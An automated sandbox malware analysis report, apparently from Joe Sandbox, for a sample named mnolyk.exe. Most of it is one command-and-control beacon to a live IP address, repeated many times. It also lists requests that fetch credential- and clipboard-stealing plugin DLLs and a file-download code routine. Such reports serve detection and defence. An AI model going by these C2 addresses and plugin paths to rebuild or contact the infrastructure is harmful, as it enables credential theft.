                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 06 Feb 2023 17:35:56 GMTContent-Type: application/octet-streamContent-Length: 91136Last-Modified: Fri, 03 Feb 2023 17:19:21 GMTConnection: keep-aliveETag: "63dd4219-16400"Accept-Ranges: bytes
                              Source: Joe Sandbox View ASN Name: TNNET-ASTNNetOyMainnetworkFI
                              Source: Joe Sandbox View IP Address: 62.204.41.4
                              Source: mnolyk.exe, 0000000F.00000002.775467476.0000000001139000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.4/Gol478Ns/Plugins/clip64.dll
                              Source: mnolyk.exe, 0000000F.00000002.775467476.0000000001139000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.4/Gol478Ns/Plugins/clip64.dll6
                              Source: mnolyk.exe, 0000000F.00000002.775467476.0000000001139000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.4/Gol478Ns/Plugins/cred64.dll
                              Source: mnolyk.exe, 0000000F.00000002.775467476.0000000001139000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.4/Gol478Ns/Plugins/cred64.dllA
                              Source: mnolyk.exe, 0000000F.00000002.775467476.0000000001139000.00000004.00000020.00020000.00000000.sdmp, mnolyk.exe, 0000000F.00000002.775467476.0000000001182000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.4/Gol478Ns/index.php
                              Source: mnolyk.exe, 0000000F.00000002.775467476.0000000001139000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.4/Gol478Ns/index.php$
                              Source: mnolyk.exe, 0000000F.00000002.775467476.00000000010FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.4/Gol478Ns/index.php/
                              Source: mnolyk.exe, 0000000F.00000002.775467476.0000000001139000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.4/Gol478Ns/index.php79e5342a2
                              Source: mnolyk.exe, 0000000F.00000002.775467476.00000000010FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.4/Gol478Ns/index.phpK
                              Source: mnolyk.exe, 0000000F.00000002.775467476.0000000001139000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.4/Gol478Ns/index.phpL
                              Source: mnolyk.exe, 0000000F.00000002.775467476.00000000010FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.4/Gol478Ns/index.phpQ
                              Source: mnolyk.exe, 0000000F.00000002.775467476.0000000001139000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.4/Gol478Ns/index.phpT
                              Source: mnolyk.exe, 0000000F.00000002.775467476.0000000001139000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.4/Gol478Ns/index.phpi
                              Source: mnolyk.exe, 0000000F.00000002.775467476.0000000001139000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.4/Gol478Ns/index.phpn
                              Source: mnolyk.exe, 0000000F.00000002.775467476.0000000001139000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.4/Gol478Ns/index.phpp
                              Source: mnolyk.exe, 0000000F.00000002.775467476.0000000001139000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.4/Gol478Ns/index.phprosoft
                              Source: mnolyk.exe, 0000000F.00000002.775467476.0000000001139000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.4/Gol478Ns/index.phpz
                              Source: mnolyk.exe, 0000000F.00000002.775467476.0000000001182000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.4/Golol478Ns/index.php
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: 14_2_010A7F00 CreateMutexW,GetLastError,SetCurrentDirectoryA,CreateFileA,InternetOpenA,InternetOpenUrlA,InternetReadFile,WriteFile,WriteFile,InternetReadFile,CloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,RemoveDirectoryA,14_2_010A7F00
                              Source: global traffic HTTP traffic detected: GET /Gol478Ns/Plugins/cred64.dll HTTP/1.1 Host: 62.204.41.4
                              Source: global traffic HTTP traffic detected: GET /Gol478Ns/Plugins/clip64.dll HTTP/1.1 Host: 62.204.41.4
                              Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Mon, 06 Feb 2023 17:35:56 GMT Content-Type: text/html Content-Length: 162 Connection: keep-alive Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>
                              Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                              Source: unknown HTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 91 Cache-Control: no-cache Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                              Source: mnolyk.exe, 0000000F.00000002.775467476.00000000010FA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                              System Summary

